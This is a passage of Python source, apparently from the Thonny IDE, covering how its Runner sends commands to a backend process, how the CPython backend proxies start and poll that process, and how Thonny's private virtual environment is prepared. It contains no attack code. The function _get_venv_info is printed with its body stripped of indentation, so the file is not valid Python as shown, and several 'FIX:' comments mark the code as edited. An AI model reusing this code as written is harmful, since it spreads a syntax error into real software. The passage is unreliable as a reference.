            group=35,
            image="terminal",
        )
        get_workbench().add_command(
            "restart",
            "run",
            "Stop/Restart backend",
            caption="Stop",
            handler=self.cmd_stop_restart,
            default_sequence="<Control-F2>",
            group=70,
            image="stop",
            include_in_toolbar=True,
        )
        get_workbench().add_command(
            "interrupt",
            "run",
            "Interrupt execution",
            handler=self._cmd_interrupt,
            tester=self._cmd_interrupt_enabled,
            default_sequence="<Control-c>",
            group=70,
            bell_when_denied=False,
        )
    def get_state(self) -> str:
        """State is one of "running", "waiting_debugger_command", "waiting_toplevel_command"
        (plus the initial "starting" set in __init__).
        """
        return self._state
    def _set_state(self, state: str) -> None:
        if self._state != state:
            logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
            self._state = state
    def is_running(self):
        return self._state == "running"
    def is_waiting(self):
        # covers both waiting_toplevel_command and waiting_debugger_command
        return self._state.startswith("waiting")
    def is_waiting_toplevel_command(self):
        return self._state == "waiting_toplevel_command"
    def is_waiting_debugger_command(self):
        return self._state == "waiting_debugger_command"
    def get_sys_path(self) -> List[str]:
        return self._proxy.get_sys_path()
    def send_command(self, cmd: CommandToBackend) -> None:
        """Offer *cmd* to the backend proxy if the current state allows it.
        May silently drop (with a bell/log) or postpone the command.
        """
        if self._proxy is None:
            return
        if self._publishing_events:
            # allow all event handlers to complete before sending the commands
            # issued by first event handlers
            self._postpone_command(cmd)
            return
        # First sanity check
        if (
            isinstance(cmd, ToplevelCommand)
            and not self.is_waiting_toplevel_command()
            and cmd.name not in ["Reset", "Run", "Debug"]
            or isinstance(cmd, DebuggerCommand)
            and not self.is_waiting_debugger_command()
        ):
            get_workbench().bell()
            logging.warning(
                "RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
            )
            return
        # Attach extra info
        if "debug" in cmd.name.lower():
            cmd["breakpoints"] = get_current_breakpoints()
        # Offer the command
        logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
        response = self._proxy.send_command(cmd)
        if response == "discard":
            return
        elif response == "postpone":
            self._postpone_command(cmd)
            return
        else:
            assert response is None
            get_workbench().event_generate("CommandAccepted", command=cmd)
        if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
            self._set_state("running")
        # capitalized command names mark backend restarts (see CPythonProxy.send_command)
        if cmd.name[0].isupper():
            get_workbench().event_generate("BackendRestart")
    def _postpone_command(self, cmd: CommandToBackend) -> None:
        # in case of InlineCommands, discard older same type command
        if isinstance(cmd, InlineCommand):
            for older_cmd in self._postponed_commands:
                if older_cmd.name == cmd.name:
                    self._postponed_commands.remove(older_cmd)
        if len(self._postponed_commands) > 10:
            logging.warning(
                "Can't pile up too many commands. This command will be just ignored"
            )
        else:
            self._postponed_commands.append(cmd)
    def _send_postponed_commands(self) -> None:
        # swap out the list first, so re-postponed commands don't loop forever
        todo = self._postponed_commands
        self._postponed_commands = []
        for cmd in todo:
            logging.debug("Sending postponed command: %s", cmd)
            self.send_command(cmd)
    def send_program_input(self, data: str) -> None:
        assert self.is_running()
        self._proxy.send_program_input(data)
    def execute_script(
        self,
        script_path: str,
        args: List[str],
        working_directory: Optional[str] = None,
        command_name: str = "Run",
    ) -> None:
        """Build a magic command line for running *script_path* (optionally
        preceded by a %cd) and submit it to the shell for execution.
        """
        if (
            working_directory is not None
            and get_workbench().get_cwd() != working_directory
        ):
            # create compound command
            # start with %cd
            cd_cmd_line = construct_cmd_line(["%cd", working_directory]) + "\n"
            next_cwd = working_directory
        else:
            # create simple command
            cd_cmd_line = ""
            next_cwd = get_workbench().get_cwd()
        # append main command (Run, run, Debug or debug)
        rel_filename = os.path.relpath(script_path, next_cwd)
        exe_cmd_line = (
            construct_cmd_line(["%" + command_name, rel_filename] + args) + "\n"
        )
        # submit to shell (shell will execute it)
        get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
    def execute_current(
        self, command_name: str, always_change_to_script_dir: bool = False
    ) -> None:
        """
        This method's job is to create a command for running/debugging
        current file/script and submit it to shell
        """
        if not self.is_waiting_toplevel_command():
            self.restart_backend(False, False, 2)
        filename = get_saved_current_script_filename()
        # changing dir may be required
        script_dir = normpath_with_actual_case(os.path.dirname(filename))
        if (
            get_workbench().get_option("run.auto_cd")
            and command_name[0].isupper()
            or always_change_to_script_dir
        ):
            working_directory = script_dir  # type: Optional[str]
        else:
            working_directory = None
        args = self._get_active_arguments()
        self.execute_script(filename, args, working_directory, command_name)
    def _get_active_arguments(self):
        # parse the program-arguments string into an argv-style list
        if get_workbench().get_option("view.show_program_arguments"):
            args_str = get_workbench().get_option("run.program_arguments")
            get_workbench().log_program_arguments_string(args_str)
            return shlex.split(args_str)
        else:
            return []
    def _cmd_run_current_script_enabled(self) -> bool:
        return (
            get_workbench().get_editor_notebook().get_current_editor() is not None
            and "run" in get_runner().get_supported_features()
        )
    def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
        return (self._proxy
                and "run_in_terminal" in self._proxy.get_supported_features()
                and self._cmd_run_current_script_enabled())
    def _cmd_run_current_script(self) -> None:
        self.execute_current("Run")
    def _cmd_run_current_script_in_terminal(self) -> None:
        filename = get_saved_current_script_filename()
        self._proxy.run_script_in_terminal(
            filename,
            self._get_active_arguments(),
            get_workbench().get_option("run.run_in_terminal_python_repl"),
            get_workbench().get_option("run.run_in_terminal_keep_open"),
        )
    def _cmd_interrupt(self) -> None:
        if self._proxy is not None:
            self._proxy.interrupt()
        else:
            logging.warning("Interrupting without proxy")
    def _cmd_interrupt_enabled(self) -> bool:
        if not self._proxy or not self._proxy.is_functional():
            return False
        # TODO: distinguish command and Ctrl+C shortcut
        widget = get_workbench().focus_get()
        if not running_on_mac_os():  # on Mac Ctrl+C is not used for Copy
            if widget is not None and hasattr(widget, "selection_get"):
                try:
                    selection = widget.selection_get()
                    if isinstance(selection, str) and len(selection) > 0:
                        # assuming user meant to copy, not interrupt
                        # (IDLE seems to follow same logic)
                        return False
                except Exception:
                    # selection_get() gives error when calling without selection on Ubuntu
                    pass
        # TODO: should it be get_runner().is_waiting_toplevel_command() ??
        return True
    def cmd_stop_restart(self) -> None:
        self.restart_backend(True)
    def _poll_vm_messages(self) -> None:
        """I chose polling instead of event_generate in listener thread,
        because event_generate across threads is not reliable
        http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
        """
        self._polling_after_id = None
        if self._pull_vm_messages() is False:
            return
        self._polling_after_id = get_workbench().after(50, self._poll_vm_messages)
    def _pull_vm_messages(self):
        """Drain the proxy's message queue, updating state and publishing
        events. Returns False when polling must stop (backend gone).
        """
        while self._proxy is not None:
            try:
                msg = self._proxy.fetch_next_message()
                if not msg:
                    break
                logging.debug(
                    "RUNNER GOT: %s, %s in state: %s",
                    msg.event_type,
                    msg,
                    self.get_state(),
                )
            except BackendTerminatedError as exc:
                self._report_backend_crash(exc)
                self.destroy_backend()
                return False
            if msg.get("SystemExit", False):
                self.restart_backend(True)
                return False
            # change state
            if isinstance(msg, ToplevelResponse):
                self._set_state("waiting_toplevel_command")
            elif isinstance(msg, DebuggerResponse):
                self._set_state("waiting_debugger_command")
            else:
                "other messages don't affect the state"
            if "cwd" in msg:
                get_workbench().set_cwd(msg["cwd"])
            # Publish the event
            # NB! This may cause another command to be sent before we get to postponed commands.
            try:
                self._publishing_events = True
                class_event_type = type(msg).__name__
                get_workbench().event_generate(class_event_type, event=msg)  # more general event
                if msg.event_type != class_event_type:
                    # more specific event
                    get_workbench().event_generate(msg.event_type, event=msg)
            finally:
                self._publishing_events = False
            # TODO: is it necessary???
            # https://stackoverflow.com/a/13520271/261181
            # get_workbench().update()
        self._send_postponed_commands()
    def _report_backend_crash(self, exc: Exception) -> None:
        """Show the backend's death (returncode + faults log) in the shell."""
        err = "Backend terminated (returncode: %s)\n" % getattr(exc, "returncode", "?")
        try:
            faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
            if os.path.exists(faults_file):
                with open(faults_file, encoding="ASCII") as fp:
                    err += fp.read()
        except Exception:
            logging.exception("Failed retrieving backend faults")
        err = err.strip() + "\nUse 'Stop/Restart' to restart the backend ...\n"
        get_workbench().event_generate("ProgramOutput", stream_name="stderr", data=err)
        get_workbench().become_active_window()
    def restart_backend(
        self, clean: bool, first: bool = False, wait: float = 0
    ) -> None:
        """Recreate (or replace) backend proxy / backend process."""
        if not first:
            get_shell().restart()
            get_shell().update_idletasks()
        self.destroy_backend()
        backend_name = get_workbench().get_option("run.backend_name")
        if backend_name not in get_workbench().get_backends():
            raise UserError(
                "Can't find backend '{}'. Please select another backend from options".format(
                    backend_name
                )
            )
        backend_class = get_workbench().get_backends()[backend_name].proxy_class
        self._set_state("running")
        self._proxy = None
        self._proxy = backend_class(clean)
        self._poll_vm_messages()
        if wait:
            # busy-wait (with GUI updates) until backend reports ready or timeout
            start_time = time.time()
            while (
                not self.is_waiting_toplevel_command()
                and time.time() - start_time <= wait
            ):
                # self._pull_vm_messages()
                get_workbench().update()
                sleep(0.01)
        get_workbench().event_generate("BackendRestart")
    def destroy_backend(self) -> None:
        """Stop polling, drop postponed commands and kill the proxy."""
        if self._polling_after_id is not None:
            get_workbench().after_cancel(self._polling_after_id)
            self._polling_after_id = None
        self._postponed_commands = []
        if self._proxy:
            self._proxy.destroy()
            self._proxy = None
    def get_local_executable(self) -> Optional[str]:
        if self._proxy is None:
            return None
        else:
            return self._proxy.get_local_executable()
    def get_backend_proxy(self) -> "BackendProxy":
        return self._proxy
    def _check_alloc_console(self) -> None:
        # Windows-only workaround: attach to a console, because GUI-mode
        # executables (thonny.exe / pythonw.exe) don't have one
        if sys.executable.endswith("thonny.exe") or sys.executable.endswith(
            "pythonw.exe"
        ):
            # These don't have console allocated.
            # Console is required for sending interrupts.
            # AllocConsole would be easier but flashes console window
            import ctypes
            kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
            exe = sys.executable.replace("thonny.exe", "python.exe").replace(
                "pythonw.exe", "python.exe"
            )
            cmd = [exe, "-c", "print('Hi!'); input()"]
            child = subprocess.Popen(
                cmd,
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                shell=True,
            )
            child.stdout.readline()
            result = kernel32.AttachConsole(child.pid)
            if not result:
                err = ctypes.get_last_error()
                logging.info("Could not allocate console. Error code: " + str(err))
            # let the child's input() return so it exits
            child.stdin.write(b"\n")
            try:
                child.stdin.flush()
            except Exception:
                # May happen eg. when installation path has "&" in it
                # See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
                # Without flush the console window becomes visible, but Thonny can be still used
                logging.getLogger("thonny").exception(
                    "Problem with finalizing console allocation"
                )
    def get_supported_features(self) -> Set[str]:
        if self._proxy is None:
            return set()
        else:
            return self._proxy.get_supported_features()
    def using_venv(self) -> bool:
        return isinstance(self._proxy, CPythonProxy) and self._proxy.in_venv
class BackendProxy:
    """Communicates with backend process.
    All communication methods must be non-blocking,
    ie. suitable for calling from GUI thread."""
    # backend_name will be overwritten on Workbench.add_backend
    # Subclasses don't need to worry about it.
    backend_name = None
    def __init__(self, clean: bool) -> None:
        """Initializes (or starts the initialization of) the backend process.
        Backend is considered ready when the runner gets a ToplevelResponse
        with attribute "welcome_text" from fetch_next_message.
        """
    def send_command(self, cmd: CommandToBackend) -> Optional[str]:
        """Send the command to backend. Return None, 'discard' or 'postpone'"""
        # dispatch to a subclass-provided handler method, if one exists
        method_name = "_cmd_" + cmd.name
        if hasattr(self, method_name):
            return getattr(self, method_name)(cmd)
        else:
            return "discard"
    def send_program_input(self, data: str) -> None:
        """Send input data to backend"""
        raise NotImplementedError()
    def fetch_next_message(self):
        """Read next message from the queue or None if queue is empty"""
        raise NotImplementedError()
    def run_script_in_terminal(self, script_path, args, interactive, keep_open):
        """Run the script in an external terminal.
        FIX: added the missing *args* parameter — Runner calls this method
        with (filename, args, interactive, keep_open) and CPythonProxy
        implements the 4-argument form, so the old 3-parameter stub could
        only ever raise TypeError instead of NotImplementedError.
        """
        raise NotImplementedError()
    def get_sys_path(self):
        "backend's sys.path"
        return []
    def get_backend_name(self):
        return type(self).backend_name
    def interrupt(self):
        """Tries to interrupt current command without resetting the backend"""
        pass
    def destroy(self):
        """Called when Thonny no longer needs this instance
        (Thonny gets closed or new backend gets selected)
        """
        pass
    def is_functional(self):
        """Used in MicroPython proxies"""
        return True
    def get_local_executable(self):
        """Return system command for invoking current interpreter"""
        return None
    def get_supported_features(self):
        """Set of feature tags, eg. {"run", "debug"}"""
        return {"run"}
class CPythonProxy(BackendProxy):
    """Abstract base for proxies which run the backend as a separate
    CPython subprocess, talking newline-delimited messages over stdio.
    """
    def __init__(self, executable):
        super().__init__(True)
        self._executable = executable
        self._proc = None
        self._message_queue = None
        self._sys_path = []
        self._usersitepackages = None
        self._gui_update_loop_id = None
        # True/False once backend reports it; None until then
        self.in_venv = None
        self._start_new_process()
    def fetch_next_message(self):
        """Pop next message from the queue; coalesce consecutive
        ProgramOutput messages of the same stream into one.
        Raises BackendTerminatedError when the process has died.
        """
        if not self._message_queue or len(self._message_queue) == 0:
            if self._proc is not None:
                retcode = self._proc.poll()
                if retcode is not None:
                    raise BackendTerminatedError(retcode)
            return None
        msg = self._message_queue.popleft()
        self._store_state_info(msg)
        if msg.event_type == "ProgramOutput":
            # combine available output messages to one single message,
            # in order to put less pressure on UI code
            while True:
                if len(self._message_queue) == 0:
                    return msg
                else:
                    next_msg = self._message_queue.popleft()
                    if (
                        next_msg.event_type == "ProgramOutput"
                        and next_msg["stream_name"] == msg["stream_name"]
                    ):
                        msg["data"] += next_msg["data"]
                    else:
                        # not same type of message, put it back
                        self._message_queue.appendleft(next_msg)
                        return msg
        else:
            return msg
    def _store_state_info(self, msg):
        # remember backend-reported facts carried piggyback on messages
        if "gui_is_active" in msg:
            self._update_gui_updating(msg)
        if "in_venv" in msg:
            self.in_venv = msg["in_venv"]
        if "path" in msg:
            self._sys_path = msg["path"]
        if "usersitepackages" in msg:
            self._usersitepackages = msg["usersitepackages"]
        if "prefix" in msg:
            self._sys_prefix = msg["prefix"]
        if "exe_dirs" in msg:
            self._exe_dirs = msg["exe_dirs"]
    def send_command(self, cmd):
        # capitalized toplevel commands (Run, Debug, Reset) restart the process
        if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
            self._close_backend()
            self._start_new_process(cmd)
        self._send_msg(cmd)
    def _send_msg(self, msg):
        self._proc.stdin.write(serialize_message(msg) + "\n")
        self._proc.stdin.flush()
    def send_program_input(self, data):
        self._send_msg(InputSubmission(data))
    def get_sys_path(self):
        return self._sys_path
    def interrupt(self):
        if self._proc is not None and self._proc.poll() is None:
            if running_on_windows():
                try:
                    # process was created with CREATE_NEW_PROCESS_GROUP,
                    # so Ctrl+Break can be delivered to it
                    os.kill(
                        self._proc.pid, signal.CTRL_BREAK_EVENT
                    )  # @UndefinedVariable
                except Exception:
                    logging.exception("Could not interrupt backend process")
            else:
                self._proc.send_signal(signal.SIGINT)
    def destroy(self):
        self._close_backend()
    def _close_backend(self):
        self._cancel_gui_update_loop()
        if self._proc is not None and self._proc.poll() is None:
            self._proc.kill()
        self._proc = None
        self._message_queue = None
    def _start_new_process(self, cmd=None):
        """Spawn the backend subprocess (optionally primed with *cmd*'s
        filename/args/environment) and start stdout/stderr listener threads.
        """
        # deque, because in one occasion I need to put messages back
        self._message_queue = collections.deque()
        # prepare environment
        my_env = get_environment_for_python_subprocess(self._executable)
        # variables controlling communication with the back-end process
        my_env["PYTHONIOENCODING"] = "utf-8"
        # Let back-end know about plug-ins
        my_env["THONNY_USER_DIR"] = THONNY_USER_DIR
        if get_workbench().in_debug_mode():
            my_env["THONNY_DEBUG"] = "1"
        elif "THONNY_DEBUG" in my_env:
            del my_env["THONNY_DEBUG"]
        if not os.path.exists(self._executable):
            raise UserError(
                "Interpreter (%s) not found. Please recheck corresponding option!"
                % self._executable
            )
        import thonny.backend_launcher
        cmd_line = [
            self._executable,
            "-u",  # unbuffered IO
            "-B",  # don't write pyo/pyc files
            # (to avoid problems when using different Python versions without write permissions)
            thonny.backend_launcher.__file__,
        ]
        if hasattr(cmd, "filename"):
            cmd_line.append(cmd.filename)
            if hasattr(cmd, "args"):
                cmd_line.extend(cmd.args)
        if hasattr(cmd, "environment"):
            my_env.update(cmd.environment)
        creationflags = 0
        if running_on_windows():
            creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
        debug("Starting the backend: %s %s", cmd_line, get_workbench().get_cwd())
        self._proc = subprocess.Popen(
            cmd_line,
            # bufsize=0,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            cwd=get_workbench().get_cwd(),
            env=my_env,
            universal_newlines=True,
            creationflags=creationflags,
        )
        # send init message
        self._send_msg({"frontend_sys_path": sys.path})
        if cmd:
            # Consume the ready message, cmd will get its own result message
            ready_line = self._proc.stdout.readline()
            if ready_line == "":  # There was some problem
                error_msg = self._proc.stderr.read()
                raise Exception("Error starting backend process: " + error_msg)
            self._store_state_info(parse_message(ready_line))
        # setup asynchronous output listeners
        Thread(target=self._listen_stdout, daemon=True).start()
        Thread(target=self._listen_stderr, daemon=True).start()
    def _listen_stdout(self):
        # debug("... started listening to stdout")
        # will be called from separate thread
        def publish_as_msg(data):
            msg = parse_message(data)
            if "cwd" in msg:
                self.cwd = msg["cwd"]
            self._message_queue.append(msg)
            if len(self._message_queue) > 100:
                # Probably backend runs an infinite/long print loop.
                # Throttle message throughput in order to keep GUI thread responsive.
                sleep(0.1)
        while True:
            data = self._proc.stdout.readline()
            # debug("... read some stdout data", repr(data))
            if data == "":
                break
            else:
                try:
                    publish_as_msg(data)
                except Exception:
                    traceback.print_exc()
                    # Can mean the line was from subprocess,
                    # which can't be captured by stream faking.
                    # NB! If subprocess printed it without linebreak,
                    # then the suffix can be thonny message
                    parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
                    # print first part as it is
                    self._message_queue.append(
                        BackendEvent(
                            "ProgramOutput", data=parts[0], stream_name="stdout"
                        )
                    )
                    if len(parts) == 2:
                        second_part = common.MESSAGE_MARKER + parts[1]
                        try:
                            publish_as_msg(second_part)
                        except Exception:
                            # just print ...
                            self._message_queue.append(
                                BackendEvent(
                                    "ProgramOutput",
                                    data=second_part,
                                    stream_name="stdout",
                                )
                            )
    def _listen_stderr(self):
        # stderr is used only for debugger debugging
        while True:
            data = self._proc.stderr.readline()
            if data == "":
                break
            else:
                self._message_queue.append(
                    BackendEvent("ProgramOutput", stream_name="stderr", data=data)
                )
    def get_local_executable(self):
        return self._executable
    def get_site_packages(self):
        # NB! site.sitepackages may not be present in virtualenv
        for d in self._sys_path:
            if ("site-packages" in d or "dist-packages" in d) and path_startswith(
                d, self._sys_prefix
            ):
                return d
        return None
    def get_user_site_packages(self):
        return self._usersitepackages
    def get_exe_dirs(self):
        return self._exe_dirs
    def _update_gui_updating(self, msg):
        """Enables running Tkinter or Qt programs which doesn't call mainloop.
        When mainloop is omitted, then program can be interacted with
        from the shell after it runs to the end.
        Each ToplevelResponse is supposed to tell, whether gui is active
        and needs updating.
        """
        if not "gui_is_active" in msg:
            return
        if msg["gui_is_active"] and self._gui_update_loop_id is None:
            # Start updating
            self._loop_gui_update(True)
        elif not msg["gui_is_active"] and self._gui_update_loop_id is not None:
            self._cancel_gui_update_loop()
    def _loop_gui_update(self, force=False):
        if force or get_runner().is_waiting_toplevel_command():
            self.send_command(InlineCommand("process_gui_events"))
        # reschedule itself every 50 ms
        self._gui_update_loop_id = get_workbench().after(50, self._loop_gui_update)
    def _cancel_gui_update_loop(self):
        if self._gui_update_loop_id is not None:
            try:
                get_workbench().after_cancel(self._gui_update_loop_id)
            finally:
                self._gui_update_loop_id = None
    def run_script_in_terminal(self, script_path, args, interactive, keep_open):
        cmd = [self._executable]
        if interactive:
            cmd.append("-i")
        cmd.append(os.path.basename(script_path))
        cmd.extend(args)
        run_in_terminal(cmd, os.path.dirname(script_path),
                        keep_open=keep_open)
    def get_supported_features(self):
        return {"run", "debug", "run_in_terminal", "pip_gui", "system_shell"}
class PrivateVenvCPythonProxy(CPythonProxy):
    """Runs the backend in Thonny's own private virtual environment,
    creating or upgrading that venv first when necessary.
    """
    def __init__(self, clean):
        self._prepare_private_venv()
        CPythonProxy.__init__(self, get_private_venv_executable())
    def _prepare_private_venv(self):
        # create the venv when missing, otherwise check it is still usable
        path = get_private_venv_path()
        if os.path.isdir(path) and os.path.isfile(os.path.join(path, "pyvenv.cfg")):
            self._check_upgrade_private_venv(path)
        else:
            self._create_private_venv(
                path, "Please wait!\nThonny prepares its virtual environment."
            )
    def _check_upgrade_private_venv(self, path):
        # If home is wrong then regenerate
        # If only micro version is different, then upgrade
        info = _get_venv_info(path)
        if not is_same_path(info["home"], os.path.dirname(sys.executable)):
            self._create_private_venv(
                path,
                "Thonny's virtual environment was created for another interpreter.\n"
                + "Regenerating the virtual environment for current interpreter.\n"
                + "(You may need to reinstall your 3rd party packages)\n"
                + "Please wait!.",
                clear=True,
            )
        else:
            venv_version = tuple(map(int, info["version"].split(".")))
            sys_version = sys.version_info[:3]
            assert venv_version[0] == sys_version[0]
            assert venv_version[1] == sys_version[1]
            if venv_version[2] != sys_version[2]:
                self._create_private_venv(
                    path,
                    "Please wait!\nUpgrading Thonny's virtual environment.",
                    upgrade=True,
                )
    def _create_private_venv(self, path, description, clear=False, upgrade=False):
        """Run `python -m venv` in a subprocess (with a progress dialog)
        and mark the result as Thonny-private.
        """
        # Don't include system site packages
        # This way all students will have similar configuration
        # independently of system Python (if Thonny is used with system Python)
        # NB! Cant run venv.create directly, because in Windows
        # it tries to link venv to thonny.exe.
        # Need to run it via proper python
        args = ["-m", "venv"]
        if clear:
            args.append("--clear")
        if upgrade:
            args.append("--upgrade")
        try:
            # pylint: disable=unused-variable
            import ensurepip  # @UnusedImport
        except ImportError:
            args.append("--without-pip")
        args.append(path)
        proc = create_frontend_python_process(args)
        from thonny.ui_utils import SubprocessDialog
        dlg = SubprocessDialog(
            get_workbench(), proc, "Preparing the backend", long_description=description
        )
        try:
            ui_utils.show_dialog(dlg)
        except Exception:
            # if using --without-pip the dialog may close very quickly
            # and for some reason wait_window would give error then
            logging.exception("Problem with waiting for venv creation dialog")
        get_workbench().become_active_window()  # Otherwise focus may get stuck somewhere
        bindir = os.path.dirname(get_private_venv_executable())
        # create private env marker
        marker_path = os.path.join(bindir, "is_private")
        with open(marker_path, mode="w") as fp:
            fp.write("# This file marks Thonny-private venv")
        # Create recommended pip conf to get rid of list deprecation warning
        # https://github.com/pypa/pip/issues/4058
        pip_conf = "pip.ini" if running_on_windows() else "pip.conf"
        with open(os.path.join(path, pip_conf), mode="w") as fp:
            fp.write("[list]\nformat = columns")
        assert os.path.isdir(path)
class SameAsFrontendCPythonProxy(CPythonProxy):
    """Backend proxy which runs the same interpreter as the front-end."""
    def __init__(self, clean):
        CPythonProxy.__init__(self, get_frontend_python())
    def fetch_next_message(self):
        """Pass messages through, tagging the welcome text with the
        interpreter's identity."""
        msg = super().fetch_next_message()
        if msg and "welcome_text" in msg:
            if using_bundled_python():
                suffix = " (bundled)"
            else:
                suffix = " (" + self._executable + ")"
            msg["welcome_text"] += suffix
        return msg
class CustomCPythonProxy(CPythonProxy):
    """Backend proxy for a user-configured ("custom") interpreter."""
    def __init__(self, clean):
        executable = get_workbench().get_option("CustomInterpreter.path")
        # Remember the usage of this non-default interpreter
        used_interpreters = get_workbench().get_option("CustomInterpreter.used_paths")
        if executable not in used_interpreters:
            used_interpreters.append(executable)
            get_workbench().set_option("CustomInterpreter.used_paths", used_interpreters)
        CPythonProxy.__init__(self, executable)
    def fetch_next_message(self):
        """Pass messages through, tagging the welcome text with the path."""
        msg = super().fetch_next_message()
        if msg and "welcome_text" in msg:
            msg["welcome_text"] = msg["welcome_text"] + " (" + self._executable + ")"
        return msg
def get_private_venv_path():
    """Return the directory reserved for Thonny's private venv,
    keyed by major/minor Python version (and bundled-ness)."""
    bundled = "thonny" in sys.executable.lower()
    prefix = "BundledPython" if bundled else "Python"
    suffix = "%d%d" % (sys.version_info[0], sys.version_info[1])
    return os.path.join(THONNY_USER_DIR, prefix + suffix)
def get_private_venv_executable():
    """Return the path of the Python executable inside the private venv."""
    venv_path = get_private_venv_path()
    if running_on_windows():
        return os.path.join(venv_path, "Scripts", WINDOWS_EXE)
    return os.path.join(venv_path, "bin", "python3")
def _get_venv_info(venv_path):
cfg_path = os.path.join(venv_path, "pyvenv.cfg")
result = {}
with open(cfg_path, encoding="UTF-8") as fp:
for line in fp:
if "=" in line:
key, val = line.split("=", maxsplit=1)
result[key.strip()] = val.strip()
return result
def using_bundled_python():
    """True when the front-end runs on Thonny's bundled Python."""
    return is_bundled_python(sys.executable)
def is_bundled_python(executable):
    """True when a thonny_python.ini marker sits next to *executable*."""
    marker = os.path.join(os.path.dirname(executable), "thonny_python.ini")
    return os.path.exists(marker)
def create_backend_python_process(
    args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
    """Used for running helper commands (eg. pip) on CPython backend.
    Assumes current backend is CPython."""
    # TODO: if backend == frontend, then delegate to create_frontend_python_process
    interpreter = get_runner().get_local_executable()
    env = get_environment_for_python_subprocess(interpreter)
    env.update(PYTHONIOENCODING="utf-8", PYTHONUNBUFFERED="1")
    # TODO: remove frontend python from path and add backend python to it
    return _create_python_process(interpreter, args, stdin, stdout, stderr, env=env)
def create_frontend_python_process(
    args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
    """Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
    python_exe = get_frontend_python().replace("pythonw.exe", "python.exe")
    env = get_environment_for_python_subprocess(python_exe)
    env["PYTHONIOENCODING"] = "utf-8"
    env["PYTHONUNBUFFERED"] = "1"
    # FIX: the prepared env was built but never passed on — now forwarded,
    # consistent with create_backend_python_process above.
    return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
def _create_python_process(
    python_exe,
    args,
    stdin=None,
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    shell=False,
    env=None,
    universal_newlines=True,
):
    """Spawn *python_exe* with *args*.

    On Windows the child is put into a new process group and its window is
    hidden (STARTF_USESHOWWINDOW). The launched Popen object gets a `cmd`
    attribute carrying the full command line for diagnostics.
    """
    startupinfo = None
    creationflags = 0
    if running_on_windows():
        creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    cmd = [python_exe] + args
    proc = subprocess.Popen(
        cmd,
        stdin=stdin,
        stdout=stdout,
        stderr=stderr,
        shell=shell,
        env=env,
        universal_newlines=universal_newlines,
        startupinfo=startupinfo,
        creationflags=creationflags,
    )
    # remember the command line for error reporting / debugging
    proc.cmd = cmd
    return proc
class BackendTerminatedError(Exception):
    """Raised when the backend process has exited; see *returncode*."""
    def __init__(self, returncode):
        super().__init__()
        self.returncode = returncode
def get_frontend_python():
    """Return the console-mode Python corresponding to the current front-end
    executable (thonny.exe / pythonw.exe are mapped to python.exe)."""
    exe = sys.executable
    for gui_name in ("thonny.exe", "pythonw.exe"):
        exe = exe.replace(gui_name, "python.exe")
    return exe
def is_venv_interpreter_of_current_interpreter(executable):
    """Return True if *executable* belongs to a venv whose base ("home")
    interpreter is the currently running one.

    Looks for pyvenv.cfg in the executable's own directory and one level up
    (the standard venv layout puts it at <venv>/pyvenv.cfg, next to bin/ or
    Scripts/), and compares its "home" value against sys.prefix.
    """
    # FIX: search relative to the executable's directory, not relative to
    # the process's current working directory as the original did.
    exe_dir = os.path.dirname(executable)
    for location in [".", ".."]:
        cfg_path = os.path.join(exe_dir, location, "pyvenv.cfg")
        if os.path.isfile(cfg_path):
            with open(cfg_path) as fp:
                content = fp.read()
            for line in content.splitlines():
                if line.replace(" ", "").startswith("home="):
                    _, home = line.split("=", maxsplit=1)
                    home = home.strip()
                    if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
                        return True
    return False
def get_environment_for_python_subprocess(target_executable):
    """Return a copy of os.environ adjusted for launching *target_executable*."""
    tweaks = get_environment_overrides_for_python_subprocess(target_executable)
    return get_environment_with_overrides(tweaks)
def get_environment_with_overrides(overrides):
    """Return a copy of os.environ with *overrides* applied.

    A value of None means "ensure the variable is absent"; a PATH override
    is merged via update_system_path instead of being assigned outright.
    """
    env = os.environ.copy()
    for key, value in overrides.items():
        if value is None:
            # Robustness fix: the original only deleted when `key in env`
            # and otherwise fell through to `assert isinstance(None, str)`,
            # crashing with AssertionError for an already-absent key.
            env.pop(key, None)
        else:
            assert isinstance(value, str)
            if key.upper() == "PATH":
                update_system_path(env, value)
            else:
                env[key] = value
    return env
def get_environment_overrides_for_python_subprocess(target_executable):
    """Take care of not confusing a different interpreter
    with variables meant for the bundled interpreter.

    Returns a dict of overrides: string values should be set in the child
    environment, None values should be removed from it (see
    get_environment_with_overrides).
    """
    # At the moment I'm tweaking the environment only if current
    # exe is bundled for Thonny.
    # In remaining cases it is user's responsibility to avoid
    # calling Thonny with environment which may be confusing for
    # different Pythons called in a subprocess.
    # Normalize windowed executables so path comparisons below line up.
    this_executable = sys.executable.replace("pythonw.exe", "python.exe")
    target_executable = target_executable.replace("pythonw.exe", "python.exe")
    # Variables whose values only make sense for one specific interpreter.
    interpreter_specific_keys = ["TCL_LIBRARY", "TK_LIBRARY",
                                 "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH",
                                 "SSL_CERT_DIR", "SSL_CERT_FILE",
                                 "PYTHONHOME", "PYTHONPATH",
                                 "PYTHONNOUSERSITE", "PYTHONUSERBASE"]
    result = {}
    if (os.path.samefile(target_executable, this_executable)
            or is_venv_interpreter_of_current_interpreter(target_executable)):
